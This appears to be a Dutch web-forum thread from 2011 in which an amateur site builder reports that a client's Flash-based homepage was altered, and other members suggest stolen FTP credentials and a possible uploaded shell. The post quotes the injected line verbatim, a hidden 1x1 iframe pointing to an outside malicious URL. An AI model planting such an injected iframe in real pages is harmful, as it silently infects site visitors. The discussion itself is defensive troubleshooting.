Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

iframe injection

Pagina: 1
Acties:

Verwijderd

Topicstarter
Hey,
Ik (als amateur) heb een tijd geleden eens een website voor iemand gemaakt in dreamweaver.
Nou kreeg ik gisteren telefoon van hem dat een kennis, met een zwaar beveiligde pc, een virus melding kreeg op zijn site en er niet op kwam. Hij gaf een virus aan in een iframe. Aangezien ik geen iframe gebruikt heb op zijn site ging ik eens kijken en zag op ws_ftp dat de index upload datum van afgelopen januari was, terwijl ik de site vorig jaar gemaakt had.

Ik heb de index geopend (bron weergeven) en er stond een regel onder aan de pagina: </html><iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=644101"></iframe> Ik mijn oude index weer geupload en de nieuwe (gehackte) overschreven.
Nou las ik ergens dat dit een "iframe-injection" is ( ??? ) en dat hackers dit kunnen doen via een formulier ofzo. De website die ik gemaakt heb is alleen een index.html met een swf. De site is helemaal in flash.
Hoe doen ze dit en wat kan ik hiertegen doen?

  • RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
[b]Vleespet schreef op dinsdag 05 april 2011 @ 10:56:[/b
Hoe doen ze dit en wat kan ik hiertegen doen?
Allereerst: Waar hoort mijn topic?
WEB >> BV

Vette kans dat je FTP account gegevens gelekt zijn; als je gebruik maakt van bijv. FileZilla (wat een populair doelwit voor virussen is) dan zou ik m'n eigen PC maar eens goed scannen.

[ Voor 13% gewijzigd door RobIII op 05-04-2011 11:12 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij


Verwijderd

Topicstarter
thanks, sorry voor het misplaatste topic.
pc helemaal gescanned (met MSE), niets te vinden.
Ik gebruik alleen WS_FTP. Dan zal ik eens de wachtwoorden
gaan veranderen (via een andere pc, lees ik net)

Verwijderd

Heb je al gekeken of er een shell op je FTP is geupload? Als hackers je FTP gegevens hebben, zijn ze meestal meer van plan dan derde te infecteren d.m.v. een iframe ( die nog niet eens encrypted is urghh ).